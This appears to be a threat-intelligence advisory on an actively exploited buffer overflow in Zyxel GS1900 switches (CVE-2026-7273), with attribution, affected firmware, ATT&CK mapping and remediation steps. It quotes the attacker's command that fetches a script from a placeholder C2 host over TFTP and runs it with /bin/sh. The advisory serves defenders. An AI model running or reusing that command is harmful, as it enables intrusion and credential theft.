Zyxel GS1900 Series Switches Stack-Based Buffer Overflow (CVE-2026-7273) Actively Exploited by Kapibala/Red Heron in Global 996-Device Campaign — Added to CISA KEV
Zyxel GS1900 Series Switches Stack-Based Buffer Overflow (TL-2026-2611), also tracked as Open Season on Kapibala, is a critical-severity software vulnerability scored CVSS 8.8, first published 2026-09-21. It is attributed to Kapibala (China) with low confidence, affects Zyxel GS1900-8, references 1 CVE (CVE-2026-7273), maps to 10 MITRE ATT&CK techniques (T1005, T1027.002, T1059.004), and is covered by 9 detection rules and 11 indicators of compromise.
Key facts for TL-2026-2611
- Threat ID
- TL-2026-2611
- Also known as
- Open Season on Kapibala
- Severity
- CRITICAL
- CVSS
- 8.8 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- Status
- ACTIVE
- Category
- VULNERABILITY
- First published
- 2026-09-21
- Last reviewed
- 2026-09-21
- Attribution
- Kapibala
- Attribution confidence
- LOW
- Nation-state nexus
- China
- Motivation
- ESPIONAGE
- Target sectors
- networkinfrastructure, smallbusiness, government administration
- Target regions
- Global, Europe, North America, East Asia
- Detection rules
- 9
- Indicators of compromise
- 11
Malware and tooling in Zyxel GS1900 Series Switches Stack-Based Buffer Overflow
Malware and tooling: Kapibala CVE-2026-7273 Python exploit script, PyArmor 6.7.5
CISA added CVE-2026-7273, an unauthenticated stack-based buffer overflow in the CGI program of Zyxel GS1900 series Smart Managed Switches, to its KEV catalog after GreyNoise documented a China-nexus actor tracked as "Kapibala" (possibly linked to Red Heron) using a PyArmor-obfuscated pre-auth exploit to compromise 996 switches across 48 countries and exfiltrate device configs and hashed root credentials via TFTP.
How Zyxel GS1900 Series Switches Stack-Based Buffer Overflow works
CVE-2026-7273 is a stack-based buffer overflow (CWE-121) in the CGI program of Zyxel's GS1900 series Smart Managed Switch firmware. Because the CGI handler fails to bound-check user-supplied input before copying it into a fixed-size stack buffer, a LAN-adjacent, unauthenticated attacker can send a single crafted HTTP request to overwrite the stack and redirect execution, ultimately achieving OS command execution on the switch (NVD CVSS 3.1: 8.8, AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Zyxel published a fix on 2026-06-16 for ten affected GS1900 models (firmware 2.10 through 2.90 depending on model), crediting five ISCAS researchers with responsible disclosure.
On 2026-09-21, GreyNoise's "Open Season on Kapibala" report disclosed that this vulnerability had been actively and successfully exploited in the wild as one component of a broader multi-CVE campaign (also touching WordPress, Gitea, UniFi OS, FlowiseAI, SENAITE LIMS, Nuclio, Proxmox VE, and the Linux kernel Dirty Pipe flaw) attributed to a cluster GreyNoise tracks as "Kapibala," assessed with low-to-moderate confidence as Chinese-speaking (UTC+8 operational tempo) and possibly identical to or affiliated with the previously documented actor "Red Heron" (Acronis, 2026-09-13), which separately weaponized a Gitea RCE (CVE-2026-60004) to deploy a Linux implant with an LD_PRELOAD rootkit. For the Zyxel sub-campaign specifically, the actor used a Python exploit script — packed with PyArmor 6.7.5 to hinder analysis — that supports command-line targeting of multiple GS1900 firmware variants across the 2.10-2.90 range. On successful exploitation the device is instructed to run `tftp -gr c -l /1 <C2> 6969;/bin/sh /1`, pulling a collector script named `c` over TFTP on a non-standard port (6969) and executing it via `/bin/sh`. The collector harvests the switch's running configuration, hashed root-level credentials, and networking information into `/tmp/info`, which is then staged to `/home/web/tmp/info.txt` ahead of exfiltration.
GreyNoise telemetry attributes 996 compromised GS1900 switches across 48 countries to this campaign, led by Italy (133), the United States (129), Taiwan (123), France (90), and South Korea (69). Notably, 564 of the 996 compromised devices (57%) were reached via unrotated factory-default administrative credentials rather than the CVE-2026-7273 exploit chain itself, indicating the actor is opportunistically combining a novel pre-auth RCE with basic credential-stuffing against exposed management interfaces. As switches sit at the network edge and grant "total control of the asset post-exploitation" per CISA, successful compromise enables traffic interception, lateral pivoting into the broader LAN, configuration tampering, and persistent access to the wider network the switch serves. CISA added CVE-2026-7273 to the KEV catalog on 2026-09-21 under BOD 26-04, with a federal remediation due date of 2026-09-24; agencies are also required to determine whether compromise occurred prior to patching.
MITRE ATT&CK techniques used in TL-2026-2611
Collection
Defense Evasion
Execution
Command and Control
T1071.002 File Transfer Protocols; T1571 Non-Standard Port
Initial Access
T1078.001 Default Accounts; T1190 Exploit Public-Facing Application
Credential Access
T1552.001 Credentials In Files
Resource Development
Reconnaissance
Affected products and versions in Zyxel GS1900 Series Switches Stack-Based Buffer Overflow
- Zyxel — GS1900-8
Vulnerable versions: 2.90(AAHH.1)C0 and earlier
Fixed in: 2.90(AAHH.2)C0 - Zyxel — GS1900-8HP
Vulnerable versions: 2.90(AAHI.1)C0 and earlier
Fixed in: 2.90(AAHI.2)C0 - Zyxel — GS1900-10HP
Vulnerable versions: 2.90(AAZI.1)C0 and earlier
Fixed in: 2.90(AAZI.2)C0 - Zyxel — GS1900-16
Vulnerable versions: 2.90(AAHJ.1)C0 and earlier
Fixed in: 2.90(AAHJ.2)C0 - Zyxel — GS1900-24
Vulnerable versions: 2.90(AAHL.1)C0 and earlier
Fixed in: 2.90(AAHL.2)C0 - Zyxel — GS1900-24E
Vulnerable versions: 2.90(AAHK.1)C0 and earlier
Fixed in: 2.90(AAHK.2)C0 - Zyxel — GS1900-24EP
Vulnerable versions: 2.90(ABTO.1)C0 and earlier
Fixed in: 2.90(ABTO.2)C0 - Zyxel — GS1900-24HPv2
Vulnerable versions: 2.90(ABTP.1)C0 and earlier
Fixed in: 2.90(ABTP.2)C0 - Zyxel — GS1900-48
Vulnerable versions: 2.90(AAHN.1)C0 and earlier
Fixed in: 2.90(AAHN.2)C0 - Zyxel — GS1900-48HPv2
Vulnerable versions: 2.90(ABTQ.1)C0 and earlier
Fixed in: 2.90(ABTQ.2)C0
Remediation for Zyxel GS1900 Series Switches Stack-Based Buffer Overflow
Patches
- Upgrade to the fixed firmware release for each affected model (e.g., GS1900-8: 2.90(AAHH.2)C0; GS1900-48HPv2: 2.90(ABTQ.2)C0) per Zyxel's 2026-06-16 advisory
Immediate actions
- Identify all Zyxel GS1900 series switches on the network and confirm exact model/firmware version against Zyxel's affected list
- Restrict or disable the web/CGI management interface from LAN and WAN access wherever it is not strictly required
- Immediately rotate factory-default administrative credentials on every GS1900 device — 57% of confirmed compromises in this campaign used unrotated default logins
- Review switch configuration and account state for signs of prior compromise before applying patches, per BOD 26-04 forensic-triage guidance
- Block outbound TFTP (UDP/69 and non-standard ports such as 6969) from network device management VLANs where not required
Workarounds
- If patching cannot occur immediately, disable remote/WAN administration and restrict CGI/web-management access to a trusted management network only
Longer-term hardening
- Segment network management interfaces (switches, APs, IoT/embedded devices) onto a dedicated, access-controlled management VLAN isolated from general LAN traffic
- Deploy network-level monitoring/IDS capable of detecting anomalous outbound TFTP and shell-invocation patterns from network infrastructure devices
- Establish a firmware patch-management and default-credential-rotation process for SMB/embedded network gear, which frequently lacks EDR coverage
CVEs associated with Zyxel GS1900 Series Switches Stack-Based Buffer Overflow
CVE-2026-7273
Weaknesses (CWE) in Zyxel GS1900 Series Switches Stack-Based Buffer Overflow
CWE-121
Timeline of Zyxel GS1900 Series Switches Stack-Based Buffer Overflow
- GreyNoise-tracked 'Kapibala' campaign begins its June-September 2026 multi-technology exploitation spree, later found to include GS1900 switch targeting.
- NVD publishes CVE-2026-7273 with CVSS 3.1 base score 8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and CWE-121 classification.
- Zyxel publishes security advisory and fixed firmware for CVE-2026-7273 across ten GS1900 series switch models, crediting five ISCAS researchers for responsible disclosure.
- Acronis TRU publishes research on 'Red Heron,' a Chinese-speaking actor GreyNoise later assesses may be linked to or identical with Kapibala, documenting its exploitation of a separate Gitea RCE (CVE-2026-60004).
- CISA adds CVE-2026-7273 to the Known Exploited Vulnerabilities catalog based on evidence of active exploitation, per BOD 26-04.
- GreyNoise publishes 'Open Season on Kapibala,' disclosing that CVE-2026-7273 was actively exploited via a PyArmor-obfuscated exploit, compromising 996 GS1900 switches across 48 countries.
- BOD 26-04 remediation due date for U.S. federal civilian agencies to patch or mitigate CVE-2026-7273.
Sources cited for Zyxel GS1900 Series Switches Stack-Based Buffer Overflow
- CISA Adds One Known Exploited Vulnerability to Catalog
- CISA Known Exploited Vulnerabilities Catalog — CVE-2026-7273
- Zyxel Security Advisory for Stack-Based Buffer Overflow Vulnerability in GS1900 Series Switches
- NVD - CVE-2026-7273
- Open Season on Kapibala: Attacker Steals Government Records via WordPress Exploitation
- Red Heron Exploits Gitea N-Day Flaw in Multinational Campaign, Exposing New Linux Rootkit
- BOD 26-04: Prioritizing Security Updates Based on Risk
- BOD 26-04: A New Era of Prioritized Remediation
More in vulnerability
- Click2Shell: WordPress Theme-Preview CSRF/Selector-Injection Chain to Forced Theme Install
- F5 BIG-IP DNS Denial of Service via BIND DNSSEC Random Subdomain Attack (CVE-2026-11622)
- Click2Shell WordPress Exploit Chain Lets Attackers Gain RCE With a Single Malicious Link
- SolarWinds Access Rights Manager Hard-Coded Cryptographic Key (CVE-2026-28326) Enables Unauthenticated RCE
- CISA Flags Three Actively Exploited Linux Kernel Vulnerabilities: kTLS Receive-Path Disclosure/DoS, ebtables SNAT Privilege Escalation, and AF_ALG Race Condition (CVE-2025-39682, CVE-2026-53266, CVE-2025-39964)
Detection coverage for TL-2026-2611
As of 2026-09-21, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2611 across Splunk SPL, Microsoft KQL and Sigma, covering 11 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.